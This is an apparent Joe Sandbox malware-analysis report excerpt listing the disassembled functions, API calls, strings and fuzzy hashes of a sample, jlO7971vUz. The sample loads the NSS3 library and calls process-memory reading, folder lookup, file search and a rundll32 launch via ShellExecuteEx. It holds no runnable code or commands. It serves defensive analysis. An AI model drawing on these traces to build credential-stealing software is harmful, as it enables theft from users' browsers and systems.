Part of subcall function 6C540F00: PR_GetPageSize.NSS3(6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F1B
Part of subcall function 6C540F00: PR_NewLogModule.NSS3(clock,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F25

PR_Lock.NSS3 ref: 6C668950

Part of subcall function 6C619BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C541A48), ref: 6C619BB3
Part of subcall function 6C619BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C541A48), ref: 6C619BC8

getprotobynumber.WSOCK32(?), ref: 6C668959
GetLastError.KERNEL32(?), ref: 6C668967
PR_GetCurrentThread.NSS3(?,?), ref: 6C66896F
PR_Unlock.NSS3(?,?), ref: 6C66898A

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CurrentThread$CriticalEnterErrorLastLockModulePageSectionSizeUnlockValuegetprotobynumber
String ID:
API String ID: 4143355744-0
Opcode ID: 3c34c11548a4593e47520d471c44f54d490926fa58f036c2d8a84bc792625e05
Instruction ID: 7e0f121d60a50eae725e0d59b1b01c4810330575073b7ec99d5740dfd2e6f6e9
Opcode Fuzzy Hash: 3c34c11548a4593e47520d471c44f54d490926fa58f036c2d8a84bc792625e05
Instruction Fuzzy Hash: DF119172A24120ABCB105F7A9C4058A7664AB4B328F094366DC1697F61D7308C14CBDE

Function 017FA063 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 017FA06F

Part of subcall function 017F934C: __getptd_noexit.LIBCMT ref: 017F934F
Part of subcall function 017F934C: __amsg_exit.LIBCMT ref: 017F935C

__amsg_exit.LIBCMT ref: 017FA08F
__lock.LIBCMT ref: 017FA09F
InterlockedDecrement.KERNEL32(?), ref: 017FA0BC
_free.LIBCMT ref: 017FA0CF
InterlockedIncrement.KERNEL32(01804530), ref: 017FA0E7

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: d797bfc7d42c6d14d7175d68da9ff6cf1a113a9f830e7ab4cf20833979f2ad60
Instruction ID: f9e9eca3db674c03123a06d605e147ded9fbf1ca0eeefaf36bb8911a40bc42a9
Opcode Fuzzy Hash: d797bfc7d42c6d14d7175d68da9ff6cf1a113a9f830e7ab4cf20833979f2ad60
Instruction Fuzzy Hash: C5018432941616DBDB22AF69A44C75FF760BF04B20F15400DEB15A7788EB34A641CFD6

Function 6C5E6840 Relevance: 9.0, APIs: 6, Instructions: 45COMMON

Download Yara Rule

APIs

PR_NewMonitor.NSS3(00000000,?,6C5EAA9B,?,?,?,?,?,?,?,00000000,?,6C5E80C1), ref: 6C5E6846

Part of subcall function 6C541770: calloc.MOZGLUE(00000001,0000019C,?,6C5415C2,?,?,?,?,?,00000001,00000040), ref: 6C54178D

PR_NewMonitor.NSS3(00000000,?,6C5EAA9B,?,?,?,?,?,?,?,00000000,?,6C5E80C1), ref: 6C5E6855

Part of subcall function 6C5A8680: calloc.MOZGLUE(00000001,00000028,00000000,-00000001,?,00000000,?,6C5555D0,00000000,00000000), ref: 6C5A868B
Part of subcall function 6C5A8680: PR_NewLock.NSS3(00000000,00000000), ref: 6C5A86A0
Part of subcall function 6C5A8680: PR_NewCondVar.NSS3(00000000,00000000,00000000), ref: 6C5A86B2
Part of subcall function 6C5A8680: PR_NewCondVar.NSS3(00000000,?,00000000,00000000), ref: 6C5A86C8
Part of subcall function 6C5A8680: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00000000,00000000), ref: 6C5A86E2
Part of subcall function 6C5A8680: malloc.MOZGLUE(00000001,?,?,?,00000000,00000000), ref: 6C5A86EC
Part of subcall function 6C5A8680: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,00000000), ref: 6C5A8700

PR_NewMonitor.NSS3(?,6C5EAA9B,?,?,?,?,?,?,?,00000000,?,6C5E80C1), ref: 6C5E687D

Part of subcall function 6C541770: PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5418DE
Part of subcall function 6C541770: InitializeCriticalSectionAndSpinCount.KERNEL32(00000020,000005DC,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5418F1

PR_NewMonitor.NSS3(?,6C5EAA9B,?,?,?,?,?,?,?,00000000,?,6C5E80C1), ref: 6C5E688C

Part of subcall function 6C541770: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C5418FC
Part of subcall function 6C541770: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,00000001,00000040), ref: 6C54198A

PR_NewLock.NSS3 ref: 6C5E68A5

Part of subcall function 6C6198D0: calloc.MOZGLUE(00000001,00000084,6C540936,00000001,?,6C54102C), ref: 6C6198E5

PR_NewLock.NSS3 ref: 6C5E68B4

Part of subcall function 6C6198D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C619946
Part of subcall function 6C6198D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C4D16B7,00000000), ref: 6C61994E
Part of subcall function 6C6198D0: free.MOZGLUE(00000000), ref: 6C61995E

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Monitor$ErrorLockcalloc$CondCountCriticalInitializeLastSectionSpinfree$mallocstrcpystrlen
String ID:
API String ID: 200661885-0
Opcode ID: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction ID: e8489938a360e2ccd11ca5f7d8ecb6f5ffdffd97a8e9d7ed776286bec6d3a51e
Opcode Fuzzy Hash: 289164870b0241f1459d04b869d0ad02f02522978031b45694acd8a1dd060f96
Instruction Fuzzy Hash: FC01FFB0A09B0B86E7516BB54C203E77AE45F453CDF10483A85A9C6B40EF61E8088BA2

Function 017F1F80 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

Part of subcall function 017F8740: lstrcpy.KERNEL32(00000000,?), ref: 017F8792
Part of subcall function 017F8740: lstrcat.KERNEL32(00000000), ref: 017F87A2

Part of subcall function 017F86C0: lstrcpy.KERNEL32(?,017FE4C7), ref: 017F8725

Part of subcall function 017F87D0: lstrlen.KERNEL32(?,017FE98C,?,00000000,017FE4C7), ref: 017F87E5
Part of subcall function 017F87D0: lstrcpy.KERNEL32(00000000), ref: 017F8824
Part of subcall function 017F87D0: lstrcat.KERNEL32(00000000,00000000), ref: 017F8832

Part of subcall function 017F6A70: GetSystemTime.KERNEL32(?,013B5F88,017FE129,?,?,?,?,?,?,?,?,?,017E4643,?,00000014), ref: 017F6A96

ShellExecuteEx.SHELL32(0000003C), ref: 017F22E7

Strings

"" , xrefs: 017F21BC
.dll, xrefs: 017F2034
C:\Windows\system32\rundll32.dll, xrefs: 017F209F
<, xrefs: 017F228C

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteFolderPathShellSystemTimelstrlen
String ID: "" $.dll$<$C:\Windows\system32\rundll32.dll
API String ID: 672783590-3078973353
Opcode ID: 08315e659a5d3062ebd9e7b0a37a6c81704210922178ba2285f680be4c1f0bd3
Instruction ID: d4bf80640b2d5cb874aeb9e43b00e04c9aad214ce5e76e0ead9caea2a74036cf
Opcode Fuzzy Hash: 08315e659a5d3062ebd9e7b0a37a6c81704210922178ba2285f680be4c1f0bd3
Instruction Fuzzy Hash: C4A1CA728101099ADF19EFA0CC99FEFF738AF24300F44415DD206666A9EF346A49CB66

Function 6C53AE30 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 231COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C53AFDA

Strings

%s at line %d of [%.10s], xrefs: 6C53AFD3
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C53AFC4
misuse, xrefs: 6C53AFCE
unable to delete/modify collation sequence due to active statements, xrefs: 6C53AF5C

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
API String ID: 632333372-924978290
Opcode ID: 3f13207c0bf554d178e79281b9f7331678db6631d80bf3db6b2af7896b96cd5f
Instruction ID: 8b1e57e24c52915e49e62007e2b0f5f3e1578194fe6c7e649026b179f1c26bd0
Opcode Fuzzy Hash: 3f13207c0bf554d178e79281b9f7331678db6631d80bf3db6b2af7896b96cd5f
Instruction Fuzzy Hash: 6391F275A042258FDF04CF99CC90BAAB7F1BF45314F1954A8E869AB791E334ED01CBA0

Function 017F4E30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 156stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 017F4E4F
??_U@YAPAXI@Z.MSVCRT ref: 017F4E7D

Part of subcall function 017F4B00: strlen.MSVCRT ref: 017F4B11
Part of subcall function 017F4B00: strlen.MSVCRT ref: 017F4B35

VirtualQueryEx.KERNEL32(017F523D,00000000,?,0000001C), ref: 017F4EC2
??_V@YAXPAX@Z.MSVCRT ref: 017F4FE3

Part of subcall function 017F4D10: ReadProcessMemory.KERNEL32(00000000,00000000,?,?,00000000,00064000,00064000,00000000,00000004), ref: 017F4D28

Strings

@, xrefs: 017F4ED6

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: strlen$MemoryProcessQueryReadVirtual
String ID: @
API String ID: 2950663791-2766056989
Opcode ID: d8a26daf1a05d9704f90a608ba1a2bfa740651e59812e4dc9b58cbe8e3144134
Instruction ID: 626d8e9e37cb65847c2e67ad89b3e5f35882f47b86657fbabf814ed10f842ea9
Opcode Fuzzy Hash: d8a26daf1a05d9704f90a608ba1a2bfa740651e59812e4dc9b58cbe8e3144134
Instruction Fuzzy Hash: 9751F7B1E04109ABDB04CF98D885AEFB7F5BF88304F148559FA1AA7344D734AA51CBA1

Function 017F33E0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,013C05C0), ref: 017F343B

Part of subcall function 017F6CF0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 017F6D1B

lstrcat.KERNEL32(?,00000000), ref: 017F3461
lstrcat.KERNEL32(?,?), ref: 017F3480
lstrcat.KERNEL32(?,?), ref: 017F3494
lstrcat.KERNEL32(?,013BB6B8), ref: 017F34A7
lstrcat.KERNEL32(?,?), ref: 017F34BB
lstrcat.KERNEL32(?,013C0C08), ref: 017F34CF

Part of subcall function 017F8560: lstrcpy.KERNEL32(017FE4C7,00000000), ref: 017F85A8

Part of subcall function 017F6CA0: GetFileAttributesA.KERNEL32(00000000,?,017EF807,?,00000000,?,00000000,017FE783,017FE782), ref: 017F6CAF

Part of subcall function 017F31E0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 017F31F0
Part of subcall function 017F31E0: HeapAlloc.KERNEL32(00000000), ref: 017F31F7
Part of subcall function 017F31E0: wsprintfA.USER32 ref: 017F3213
Part of subcall function 017F31E0: FindFirstFileA.KERNEL32(?,?), ref: 017F322A

Memory Dump Source

Source File: 00000000.00000002.2244768621.00000000017E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017E0000, based on PE: true

Associated: 00000000.00000002.2244768621.000000000182E000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000188A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.000000000192D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A05000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2244768621.0000000001A17000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17e0000_jlO7971vUz.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 167551676-0
Opcode ID: 58fe0ff00063251fe32376ea867f9fa079a7b41adb4b6ec638a39e7e67bb0d28
Instruction ID: 9a64bf5abf0b89f624e0d07e80357a0b39c07f38dd7fa4038c5dcaa9ac02fcec
Opcode Fuzzy Hash: 58fe0ff00063251fe32376ea867f9fa079a7b41adb4b6ec638a39e7e67bb0d28
Instruction Fuzzy Hash: 033182F694021957CB25FBB0CC8CEDAB37CBB68700F40459DB34996188EA70A789CF94

Function 6C5649C0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 6C564860: SEC_QuickDERDecodeItem_Util.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C564894

PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C566361,?,?,?), ref: 6C564A8F
PR_SetError.NSS3(FFFFE006,00000000,?,?,?,?,?,6C566361,?,?,?), ref: 6C564AD0

Strings

acVl, xrefs: 6C5649FB
^jVl, xrefs: 6C5649C5
acVl, xrefs: 6C564AB4

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Error$DecodeItem_QuickUtil
String ID: ^jVl$acVl$acVl
API String ID: 1982233058-3109656946
Opcode ID: 3b367a019da77529d6017684879c179eebc5b90a85bd6a8c8f6786df8fd83212
Instruction ID: 88268b86c19abdb31370f4324b35e58e01df9a077b01951b4e7ea3b1ce642a9a
Opcode Fuzzy Hash: 3b367a019da77529d6017684879c179eebc5b90a85bd6a8c8f6786df8fd83212
Instruction Fuzzy Hash: E731D970A04106ABFB14CA5AECB0B6F7267DB82318F604A3AD515F7FE1C7349C45879A

Function 6C5C6DE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88COMMON

Download Yara Rule

APIs

PR_MillisecondsToInterval.NSS3(?), ref: 6C5C6E36
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5C6E57

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PR_MillisecondsToInterval.NSS3(?), ref: 6C5C6E7D
PR_MillisecondsToInterval.NSS3(?), ref: 6C5C6EAA

Strings

nfl, xrefs: 6C5C6DF9

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: IntervalMilliseconds$ErrorValue
String ID: nfl
API String ID: 3163584228-3599519066
Opcode ID: 0217e0e09f89b8ab464fc15aa483ce888dfa09acf63f59bee9b8275d8368d0ec
Instruction ID: 2f7e7d1273946f79cd02e1ffdd258d108e2b7b52e5fdb7a6d237f1638c3f29fc
Opcode Fuzzy Hash: 0217e0e09f89b8ab464fc15aa483ce888dfa09acf63f59bee9b8275d8368d0ec
Instruction Fuzzy Hash: F431B131714712EEDB145EB4CC043A7B7A4AB0131AF140A3ED49AD6B40EF30AA58CF83

Function 6C5FA8F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C5E2AE9,00000000,0000065C), ref: 6C5FA91D

Part of subcall function 6C59ADC0: TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE10
Part of subcall function 6C59ADC0: EnterCriticalSection.KERNEL32(?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE24
Part of subcall function 6C59ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6C57D079,00000000,00000001), ref: 6C59AE5A
Part of subcall function 6C59ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE6F
Part of subcall function 6C59ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE7F
Part of subcall function 6C59ADC0: TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEB1
Part of subcall function 6C59ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AEC9

PK11_FreeSymKey.NSS3(?,00000000,00000000,?,?,6C5E2AE9,00000000,0000065C), ref: 6C5FA934
SECITEM_ZfreeItem_Util.NSS3(?,00000000,00000000,00000000,?,?,6C5E2AE9,00000000,0000065C), ref: 6C5FA949
free.MOZGLUE(?,00000000,0000065C), ref: 6C5FA952

Strings

*^l, xrefs: 6C5FA8F6

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID: *^l
API String ID: 1595327144-2126094313
Opcode ID: b9ec79ccfa33cd6953a61b433683d6228600d9257384cdc421dea8ee2c9fb427
Instruction ID: d3913673d58ed7458ce65f2792dfc4254792fcf393dcf93fd2742d002cc9ca2a
Opcode Fuzzy Hash: b9ec79ccfa33cd6953a61b433683d6228600d9257384cdc421dea8ee2c9fb427
Instruction Fuzzy Hash: BA312AB4601201DFE708CF25DA80E62B7E8FF48318B1581A9E8198B756E731EC01CFA2

Function 6C62A800 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

_byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000001,?,?,?,?,?,?,?,?,6C4F7915,?,?), ref: 6C62A86D
sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010800,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?,?,?,?,?,?,?,?,6C4F7915,?,?), ref: 6C62A8A6

Strings

%s at line %d of [%.10s], xrefs: 6C62A8A0
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C62A891
database corruption, xrefs: 6C62A89B

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: _byteswap_ulongsqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
API String ID: 912837312-598938438
Opcode ID: 31a7a5aeeb5be6e16803686ab936d705785c7f00629a1d0e3a1d8cecec5ac1ff
Instruction ID: 527af0801b3b81365b0a3e841597217c773c917fea7081f618443596e6c75ad9
Opcode Fuzzy Hash: 31a7a5aeeb5be6e16803686ab936d705785c7f00629a1d0e3a1d8cecec5ac1ff
Instruction Fuzzy Hash: DB110371A00204ABDB048F21DC40AAAB7A5FF89314F004029FC194BB81EB78A916CB9A

Function 6C540DC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 51stringCOMMON

Download Yara Rule

APIs

strrchr.VCRUNTIME140(00000000,0000005C,00000000,00000000,00000000,?,6C540BDE), ref: 6C540DCB
strrchr.VCRUNTIME140(00000000,0000005C,?,6C540BDE), ref: 6C540DEA
_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(00000001,00000001,?,?,?,6C540BDE), ref: 6C540DFC
PR_LogPrint.NSS3(%s incr => %d (find lib),?,?,?,?,?,?,?,6C540BDE), ref: 6C540E32

Strings

%s incr => %d (find lib), xrefs: 6C540E2D

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: strrchr$Print_stricmp
String ID: %s incr => %d (find lib)
API String ID: 97259331-2309350800
Opcode ID: d296159553aba23c17e494e866991853efefca8d83d971b87d8e95e3e0f3df91
Instruction ID: 2ce6e64553a05ccbbd302046215c71a6443ea344a7ab315174c193fa360e8bf0
Opcode Fuzzy Hash: d296159553aba23c17e494e866991853efefca8d83d971b87d8e95e3e0f3df91
Instruction Fuzzy Hash: E4012871B00620AFE7108F269C85E1773ECDB85709B14882ED905D7A41E762FC2487E5

Function 6C5FAC00 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,@]^l,00000000,?,?,6C5D6AC6,?), ref: 6C5FAC2D

Part of subcall function 6C59ADC0: TlsGetValue.KERNEL32(?,6C57CDBB,?,6C57D079,00000000,00000001), ref: 6C59AE10
